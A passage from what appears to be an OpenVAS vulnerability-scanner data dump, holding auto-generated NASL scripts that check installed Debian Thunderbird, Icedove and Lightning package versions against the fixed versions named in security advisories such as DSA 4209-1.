report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-zh-cn\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-zh-tw\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ar\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ast\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-be\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-bg\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-bn-bd\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-br\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ca\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-cs\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-cy\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-da\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-de\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-dsb\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-el\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-en-gb\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-es-ar\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-es-es\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-et\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-eu\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-fi\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-fr\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-fy-nl\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ga-ie\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-gd\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-gl\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-he\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-hr\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-hsb\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-hu\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-hy-am\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-id\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-is\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-it\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ja\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-kab\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ko\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-lt\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-nb-no\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-nl\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-nn-no\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-pa-in\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-pl\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-pt-br\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-pt-pt\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-rm\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ro\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ru\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-si\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-sk\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-sl\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-sq\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-sr\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-sv-se\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ta-lk\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-tr\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-uk\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-vi\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-zh-cn\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-zh-tw\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-dbg\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-dev\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-all\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ar\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ast\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-be\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-bg\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-bn-bd\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-br\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ca\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-cs\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-da\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-de\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-dsb\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-el\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-en-gb\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-es-ar\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-es-es\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-et\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-eu\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-fi\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-fr\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-fy-nl\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ga-ie\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-gd\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-gl\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-he\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-hr\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-hsb\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-hu\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-hy-am\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-id\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-is\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-it\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ja\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-kab\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ko\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-lt\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-nb-no\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-nl\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-nn-no\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-pa-in\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-pl\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-pt-br\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-pt-pt\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-rm\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ro\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ru\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-si\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-sk\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-sl\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-sq\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-sr\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-sv-se\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ta-lk\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-tr\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-uk\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-vi\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-zh-cn\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-zh-tw\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-04T18:55:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5155", "CVE-2018-5170", "CVE-2018-5183", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5159"], "description": "Multiple security issues have been found in Thunderbird, which may lead\nto the execution of arbitrary code, denial of service or attacks on\nencrypted emails.", "modified": "2019-07-04T00:00:00", "published": "2018-05-25T00:00:00", "id": "OPENVAS:1361412562310704209", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704209", "type": "openvas", "title": "Debian Security Advisory DSA 4209-1 (thunderbird - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4209-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704209\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-5150\", \"CVE-2018-5154\", \"CVE-2018-5155\", \"CVE-2018-5159\", \"CVE-2018-5161\",\n \"CVE-2018-5162\", \"CVE-2018-5168\", \"CVE-2018-5170\", \"CVE-2018-5178\", \"CVE-2018-5183\",\n \"CVE-2018-5184\", \"CVE-2018-5185\");\n script_name(\"Debian Security Advisory DSA 4209-1 (thunderbird - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-25 00:00:00 +0200 (Fri, 25 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4209.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB[89]\");\n script_tag(name:\"affected\", value:\"thunderbird on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), these problems have been fixed\nin version 1:52.8.0-1~deb8u1.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 1:52.8.0-1~deb9u1.\n\nWe recommend that you upgrade your thunderbird packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/thunderbird\");\n script_tag(name:\"summary\", value:\"Multiple security issues have been found in Thunderbird, which may lead\nto the execution of arbitrary code, denial of service or attacks on\nencrypted emails.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"calendar-google-provider\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-dbg\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-dev\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-all\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ar\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ast\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-be\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-bg\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-bn-bd\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-br\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ca\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-cs\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-da\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-de\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-dsb\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-el\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-en-gb\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-es-ar\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-es-es\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-et\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-eu\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-fi\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-fr\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-fy-nl\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ga-ie\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-gd\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-gl\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-he\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-hr\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-hsb\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-hu\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += 